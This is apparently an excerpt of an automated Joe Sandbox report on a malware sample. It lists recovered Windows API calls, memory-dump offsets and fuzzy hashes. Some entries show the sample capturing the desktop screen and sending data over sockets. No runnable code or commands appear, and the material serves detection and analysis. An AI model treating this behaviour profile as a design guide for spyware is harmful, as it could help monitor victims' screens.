                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2060118545-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 02C643EC
                                                                                                                                                                        • Part of subcall function 02C613A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02C613CB
                                                                                                                                                                        • Part of subcall function 02C64C50: HeapFree.KERNEL32(?,00000000,?,00000000,02C64E35,?,02C642C8,02C64E35,00000000,?,?,02C64E35,?), ref: 02C64C77
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 02C643D7
                                                                                                                                                                      • SetLastError.KERNEL32(00000057), ref: 02C64401
                                                                                                                                                                      • WSAGetLastError.WS2_32(?), ref: 02C64410
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$Heap$AllocFree
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1906775185-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 0377DE93
                                                                                                                                                                      • _free.LIBCMT ref: 0377DED5
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0377DC95), ref: 0377DEFC
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0377DF03
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap_free$FreeProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1072109031-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAEventSelect.WS2_32(?,03773ABB,00000023), ref: 03773C02
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 03773C0D
                                                                                                                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 03773C58
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 03773C63
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 259408233-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAEventSelect.WS2_32(?,02C63ABB,00000023), ref: 02C63C02
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 02C63C0D
                                                                                                                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 02C63C58
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 02C63C63
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 259408233-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(03774FB5,03774E55,037742BE,00000000,?,?,03774E55,?,?,?,?,00000000,000000FF), ref: 037741E8
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(03774FB5,?,?,?,00000000,000000FF), ref: 037741F6
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(03774FB5), ref: 03774257
                                                                                                                                                                      • SetEvent.KERNEL32(8520468B), ref: 03774272
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3394196147-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • timeGetTime.WINMM(00000001,?,00000001,?,03773C4F,?,?,00000001), ref: 03774B15
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 03774B24
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 03774B31
                                                                                                                                                                      • timeGetTime.WINMM(?,03773C4F,?,?,00000001), ref: 03774B48
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IncrementInterlockedTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 159728177-0
                                                                                                                                                                      • Opcode ID: 2d29f950abcb92e1be7bc8aed5159d0e1a87a3e91a497eaf2c54820556c93cba
                                                                                                                                                                      • Instruction ID: c5be0eff06ee298ab060f89ae2d84b9ab0a15a166a78ba91c6ae20c8bc27c3a1
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d29f950abcb92e1be7bc8aed5159d0e1a87a3e91a497eaf2c54820556c93cba
                                                                                                                                                                      • Instruction Fuzzy Hash: D701C8B5600709AFCB20EF7AD88094AFBE8AF5C650701892AE549C7611E674E5458FA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • timeGetTime.WINMM(00000001,?,00000001,?,02C63C4F,?,?,00000001), ref: 02C64AF5
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 02C64B04
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 02C64B11
                                                                                                                                                                      • timeGetTime.WINMM(?,02C63C4F,?,?,00000001), ref: 02C64B28
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IncrementInterlockedTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 159728177-0
                                                                                                                                                                      • Opcode ID: 6c38361ec67a061d6d8da1770e7457a37d7585e48e0688ca37b0a91043a776bb
                                                                                                                                                                      • Instruction ID: 7e25217407920401b2a38434738d53e748d40f331157772e524a2fa4254aa104
                                                                                                                                                                      • Opcode Fuzzy Hash: 6c38361ec67a061d6d8da1770e7457a37d7585e48e0688ca37b0a91043a776bb
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01DAB5A00705AFC720DF7AD880A5AFBF9BF98750750892EE549C7600E774E6448FE0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03773667
                                                                                                                                                                      • _free.LIBCMT ref: 0377369C
                                                                                                                                                                        • Part of subcall function 0377F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03783E4C,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F64F
                                                                                                                                                                        • Part of subcall function 0377F639: GetLastError.KERNEL32(00000000,?,03783E4C,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000), ref: 0377F661
                                                                                                                                                                      • _malloc.LIBCMT ref: 037736D7
                                                                                                                                                                      • _memset.LIBCMT ref: 037736E5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3340475617-0
                                                                                                                                                                      • Opcode ID: 3806aae17cb98ad2d5c9e0c5e9638e05b579b1f73b3367de8ffb54a624c0172f
                                                                                                                                                                      • Instruction ID: f86e4025fb4765d16b546b26924c9c5ff16b33fb9cfcc3775034daa21520486e
                                                                                                                                                                      • Opcode Fuzzy Hash: 3806aae17cb98ad2d5c9e0c5e9638e05b579b1f73b3367de8ffb54a624c0172f
                                                                                                                                                                      • Instruction Fuzzy Hash: BA01DAF5900B04DFE760DF7A9885B97BBE9EB85214F14482ED5AEC7301D635A8058F60
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C63667
                                                                                                                                                                      • _free.LIBCMT ref: 02C6369C
                                                                                                                                                                        • Part of subcall function 02C66E49: HeapFree.KERNEL32(00000000,00000000,?,02C69900,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66E5F
                                                                                                                                                                        • Part of subcall function 02C66E49: GetLastError.KERNEL32(00000000,?,02C69900,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000), ref: 02C66E71
                                                                                                                                                                      • _malloc.LIBCMT ref: 02C636D7
                                                                                                                                                                      • _memset.LIBCMT ref: 02C636E5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3340475617-0
                                                                                                                                                                      • Opcode ID: c1320acf76272d252a2a9d4fbdc8f3bf32ca8fe7d766dd46f15975819a017d58
                                                                                                                                                                      • Instruction ID: cb6f9b9cc6d7edf5512332b7c3c6f93ba014364c024fc68dffa9a302cc1053fa
                                                                                                                                                                      • Opcode Fuzzy Hash: c1320acf76272d252a2a9d4fbdc8f3bf32ca8fe7d766dd46f15975819a017d58
                                                                                                                                                                      • Instruction Fuzzy Hash: 2501C4F1900B449FE3209F7AD8C5BA7BAE9EF85354F10482EE5AE83301D634A9048F60
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 02BD6F08
                                                                                                                                                                        • Part of subcall function 02BD6E5A: __FF_MSGBANNER.LIBCMT ref: 02BD6E73
                                                                                                                                                                        • Part of subcall function 02BD6E5A: __NMSG_WRITE.LIBCMT ref: 02BD6E7A
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02BD6F3D
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02BD6F57
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BD6F68
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2388904642-0
                                                                                                                                                                      • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                      • Instruction ID: 612d9a7f7a48b13a53dc34b47475defd59ad095de0f701030faffb0870b5226f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                      • Instruction Fuzzy Hash: C4F02831404699A7DB00EB64EC84AED7BFEEB41314F1400A8E4149E0D1FFB1DAC1CB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 035FF0E0
                                                                                                                                                                        • Part of subcall function 035FF032: __FF_MSGBANNER.LIBCMT ref: 035FF04B
                                                                                                                                                                        • Part of subcall function 035FF032: __NMSG_WRITE.LIBCMT ref: 035FF052
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 035FF115
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 035FF12F
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 035FF140
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2388904642-0
                                                                                                                                                                      • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                      • Instruction ID: 19afa9154ab7612b7ca821b31126310de017f1f333c38a88e8386603f7ad02a2
                                                                                                                                                                      • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                      • Instruction Fuzzy Hash: 87F0F439800316AFDB15EB54FC15ABF7ABDFB80644F94406DDA01AA5F0DB718A02CB40
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03771420: HeapFree.KERNEL32(?,00000000,?,?,?,037740B1,?,00000000,03774039,?,74DEDFA0,03773648), ref: 0377143D
                                                                                                                                                                        • Part of subcall function 03771420: _free.LIBCMT ref: 03771459
                                                                                                                                                                      • HeapDestroy.KERNEL32(00000000), ref: 0377CD93
                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?), ref: 0377CDA5
                                                                                                                                                                      • _free.LIBCMT ref: 0377CDB5
                                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 0377CDE2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4097506873-0
                                                                                                                                                                      • Opcode ID: dbda65b41be41c2e1996ce2aea4947b2ceae82acc09c81148f6578ba62458830
                                                                                                                                                                      • Instruction ID: f2cf59613ff713b301656ba0d24e1906d85e29f06e15309101aec7d536f2e25a
                                                                                                                                                                      • Opcode Fuzzy Hash: dbda65b41be41c2e1996ce2aea4947b2ceae82acc09c81148f6578ba62458830
                                                                                                                                                                      • Instruction Fuzzy Hash: 27F04FB9100706ABD710EF24E808B57FBB8FF44B10F158A19E859DB644D734E852CB90
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C61420: HeapFree.KERNEL32(?,00000000,?,?,?,02C640B1,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C6143D
                                                                                                                                                                        • Part of subcall function 02C61420: _free.LIBCMT ref: 02C61459
                                                                                                                                                                      • HeapDestroy.KERNEL32(00000000), ref: 02C664A3
                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?), ref: 02C664B5
                                                                                                                                                                      • _free.LIBCMT ref: 02C664C5
                                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 02C664F2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4097506873-0
                                                                                                                                                                      • Opcode ID: 91ff612e470b53e669424ebc71a8820fdf192f272128dd722c17638c20c3315f
                                                                                                                                                                      • Instruction ID: bafd575229a192f45f716426cbabb80e16b40cbd5df4ef4caf8fa176f24858a1
                                                                                                                                                                      • Opcode Fuzzy Hash: 91ff612e470b53e669424ebc71a8820fdf192f272128dd722c17638c20c3315f
                                                                                                                                                                      • Instruction Fuzzy Hash: 67F037B5500702ABE720DF25E898B23B7F8FF84754F248918E859D3644DB39E855CBE0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 035F997F
                                                                                                                                                                        • Part of subcall function 035FF032: __FF_MSGBANNER.LIBCMT ref: 035FF04B
                                                                                                                                                                        • Part of subcall function 035FF032: __NMSG_WRITE.LIBCMT ref: 035FF052
                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 035F9B42
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _malloc_memcpy_s
                                                                                                                                                                      • String ID: &
                                                                                                                                                                      • API String ID: 3561290194-3042966939
                                                                                                                                                                      • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                                                                      • Instruction ID: 6b8e17329d542dd6fa5ea10c625e10778bda1bc1dfd24a3d39878f40feca980e
                                                                                                                                                                      • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                                                                      • Instruction Fuzzy Hash: 4DC170F1A006199FDB24DF55DCC0BAAB7B8FB88300F1485ADD709A7261D734AA85CF64
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset_wcsrchr
                                                                                                                                                                      • String ID: D
                                                                                                                                                                      • API String ID: 1675014779-2746444292
                                                                                                                                                                      • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                      • Instruction ID: ffe59406dc0092a19d57dca6d10aa6e31a657f1bd1d9d11cc82acf1dc5f78109
                                                                                                                                                                      • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                      • Instruction Fuzzy Hash: 4931E9729402187BE724D7A4AC8AFFF777CEB44710F140169FB0A9A1D0DA715906C7E5
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDesktopWindow.USER32 ref: 0377BC8F
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDC.USER32(00000000), ref: 0377BC9C
                                                                                                                                                                        • Part of subcall function 0377BC70: CreateCompatibleDC.GDI32(00000000), ref: 0377BCA2
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDC.USER32(00000000), ref: 0377BCAD
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 0377BCBA
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 0377BCC2
                                                                                                                                                                        • Part of subcall function 0377BC70: ReleaseDC.USER32(00000000,00000000), ref: 0377BCD3
                                                                                                                                                                        • Part of subcall function 0377BC70: GetSystemMetrics.USER32(0000004C), ref: 0377BD78
                                                                                                                                                                        • Part of subcall function 0377BC70: GetSystemMetrics.USER32(0000004D), ref: 0377BD8D
                                                                                                                                                                        • Part of subcall function 0377BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0377BDA6
                                                                                                                                                                        • Part of subcall function 0377BC70: SelectObject.GDI32(?,00000000), ref: 0377BDB4
                                                                                                                                                                        • Part of subcall function 0377BC70: SetStretchBltMode.GDI32(?,00000003), ref: 0377BDC0
                                                                                                                                                                        • Part of subcall function 0377BC70: GetSystemMetrics.USER32(0000004F), ref: 0377BDCD
                                                                                                                                                                        • Part of subcall function 0377BC70: GetSystemMetrics.USER32(0000004E), ref: 0377BDE0
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • _memset.LIBCMT ref: 0377B1E1
                                                                                                                                                                      • swprintf.LIBCMT ref: 0377B204
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                                                                                      • String ID: %s %s
                                                                                                                                                                      • API String ID: 1028806752-581060391
                                                                                                                                                                      • Opcode ID: 702c72db160cd81a1c1fb5739f5aeb5435b8c006a9f8a2799fa0b4ffc2acae70
                                                                                                                                                                      • Instruction ID: 1d7fdcf5aa4454b06a2e44a982a0833d587dc5f19bd8873f214cfa8fb47e7a83
                                                                                                                                                                      • Opcode Fuzzy Hash: 702c72db160cd81a1c1fb5739f5aeb5435b8c006a9f8a2799fa0b4ffc2acae70
                                                                                                                                                                      • Instruction Fuzzy Hash: 6521F3B6A04340ABDB10EF14AC88E6FB7E8EFD9710F08056EF4895B201E6609904C7A3
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03779115
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF4E
                                                                                                                                                                        • Part of subcall function 0377EF39: __CxxThrowException@8.LIBCMT ref: 0377EF63
